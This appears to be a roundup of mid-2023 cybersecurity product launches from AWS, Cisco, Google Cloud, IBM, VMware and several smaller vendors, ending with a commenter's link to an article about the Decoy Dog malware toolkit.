AWS has announced three new capabilities for its Amazon GuardDuty threat detection service to help customers protect container, database and serverless workloads. The new capabilities include container runtime protection for Amazon Elastic Kubernetes Service (EKS), extended coverage for data stored in Amazon Aurora, and support for serverless applications in AWS Lambda.
Cisco unveils new XDR solution
Cisco has unveiled a new extended detection and response (XDR) solution that is designed to help organizations prioritize and remediate security incidents more efficiently using automation. The solution is currently in Beta with general availability expected for July 2023.
Google Cloud announces Security AI Workbench and ecosystem expansion
Google Cloud announced Security AI Workbench, a platform that enables partners to extend generative AI to their products. Security AI Workbench also powers a new VirusTotal code analysis feature. In addition, Google Cloud and Mandiant are combining their cybersecurity partner ecosystems, which total more than 100 vendors.
IBM launches new QRadar Security Suite
IBM has launched a new threat detection and response solution. The QRadar Security Suite includes EDR and XDR, SIEM, SOAR and log management capabilities. The company says it has rearchitected its threat detection and response portfolio to maximize speed and efficiency, and to meet the specific needs of security analysts.
Oak9 releases open source security-as-code framework and SDK
Oak9 has released Tython, an open source security-as-code (SaC) framework and software development kit (SDK) that allows security teams to build custom security reference architectures and design patterns as code.
Securonix launches unified SIEM platform
Securonix has launched its Unified Defense SIEM platform, which can accommodate massive data demands and provides threat content-as-a-service. It also provides threat sweeping, intelligence sharing, and investigation capabilities.
Sevco Security launches CAASM platform
Sevco Security has launched its cyber attack surface management (CAASM) platform, a solution powered by what the company describes as a proprietary 4D cybersecurity asset intelligence correlation and visualization engine.
SecureIQLab announces cloud firewall testing
SecureIQLab has announced an Advanced Cloud Firewall (ACFW) test designed to evaluate the ability of cloud security solutions to withstand various types of attacks. The testing process combines elements of the MITRE ATT&CK framework and the Lockheed Martin Cyber Kill Chain Model to evaluate security, performance and operational capabilities.
VMware unveils new security capabilities
VMware has unveiled several new security capabilities, including a Firewall Service offering to bring NSX security capabilities to VMware SD-WAN edge appliances, VMware Secure App IX for more secure application connectivity, and VMware Workspace ONE updates for phishing, secure access, and patch management.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/decoy-dog-malware-toolkit-found-after-analyzing-70-billion-dns-queries/